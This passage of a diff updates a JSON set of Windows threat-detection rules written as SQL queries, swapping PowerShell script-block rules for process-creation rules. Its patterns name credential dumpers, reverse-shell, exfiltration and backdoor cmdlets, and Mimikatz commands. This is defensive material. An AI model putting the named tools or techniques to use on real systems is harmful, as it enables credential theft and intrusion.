'\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], 